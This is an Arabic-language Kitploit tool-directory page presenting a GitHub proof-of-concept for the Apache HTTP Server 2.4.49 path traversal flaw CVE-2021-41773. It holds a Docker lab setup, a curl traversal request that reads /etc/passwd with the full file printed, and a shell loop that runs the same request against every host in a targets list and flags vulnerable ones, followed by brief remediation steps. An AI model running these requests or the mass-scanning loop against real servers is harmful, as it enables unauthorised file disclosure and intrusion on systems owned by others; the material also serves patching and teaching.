Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-41773h — إثبات المفهوم واستغلال لثغرة اجتياز المسار في Apache HTTP Server 2.4.49 (CVE-2021-41773) مع إعداد Docker، وأوامر استغلال قائمة على curl، وإرشادات المعالجة. | Kitploit
أدوات/GitHubGitHub/mightysai1997/cve-2021-41773h
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالتعلم والتعليم
GitHubmightysai1997/cve-2021-41773h

CVE-2021-41773h

إثبات المفهوم واستغلال لثغرة اجتياز المسار في Apache HTTP Server 2.4.49 (CVE-2021-41773) مع إعداد Docker، وأوامر استغلال قائمة على curl، وإرشادات المعالجة.

عرض المستودع
3منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-41773

ثغرة اجتياز المسار وكشف الملفات في Apache HTTP Server 2.4.49 (CVE-2021-41773)

معلومات

تم العثور على عيب في تغيير تم إجراؤه على تسوية المسار في Apache HTTP Server 2.4.49. يمكن للمهاجم استخدام هجوم اجتياز المسار لتعيين عناوين URL إلى ملفات خارج جذر المستند المتوقع.

إذا كانت الملفات خارج جذر المستند غير محمية بواسطة "require all denied"، فقد تنجح هذه الطلبات. بالإضافة إلى ذلك، يمكن لهذا العيب تسريب مصدر الملفات المفسرة مثل نصوص CGI.

من المعروف أن هذه المشكلة يتم استغلالها في الواقع.

تؤثر هذه المشكلة فقط على Apache 2.4.49 وليس الإصدارات السابقة.

شكر وتقدير: تم الإبلاغ عن هذه المشكلة من قبل Ash Daulton مع فريق أمن cPanel

تم الإبلاغ لفريق الأمن 2021-09-29 تم الإصلاح بواسطة r1893775 في 2.4.50 2021-10-01 تم إصدار التحديث 2.4.50 2021-10-04 الإصدارات المتأثرة 2.4.49

إثبات المفهوم (POC)

$ docker build -t cve-2021-41773 .
$ docker run --rm -d -p 80:80 cve-2021-41773

تأكيد العمل

$ curl -I http://localhost
HTTP/1.1 200 OK
Date: Wed, 06 Oct 2021 13:25:18 GMT
Server: Apache/2.4.49 (Unix)
Last-Modified: Mon, 11 Jun 2007 18:53:14 GMT
ETag: "2d-432a5e4a73a80"
Accept-Ranges: bytes
Content-Length: 45
Content-Type: text/html

استغلال 1

curl --data "echo;id" 'http://localhost/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'

المخرجات

root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
www-data:x:82:82:Linux User,,,:/home/www-data:/sbin/nologin
utmp:x:100:406:utmp:/home/utmp:/bin/false

استغلال 2

cat targets | while read host do ; do curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n";done

المخرجات

root:x:0:0:root:/root:/bin/ash
operator:x:11:0:operator:/root:/sbin/nologin
localhost Vulnerable

كيفية الإصلاح

  1. تحديث Apache HTTP Server إلى الإصدار 2.4.50 الذي تم إصداره بتاريخ 2021-10-04
  2. منع وتحرير ما يلي في ملف إعدادات Apache:
<!-- Vulnerable (Require all granted in '/') -->
<Directory />
  Options FollowSymLinks
  AllowOverride None
  Require all granted
</Directory>

<!-- Patched (Require all denied in '/') -->
<Directory />
  Options FollowSymLinks
  AllowOverride None
  Require all denied
</Directory>

المراجع

  • https://httpd.apache.org/security/vulnerabilities_24.html
تنزيل الأداة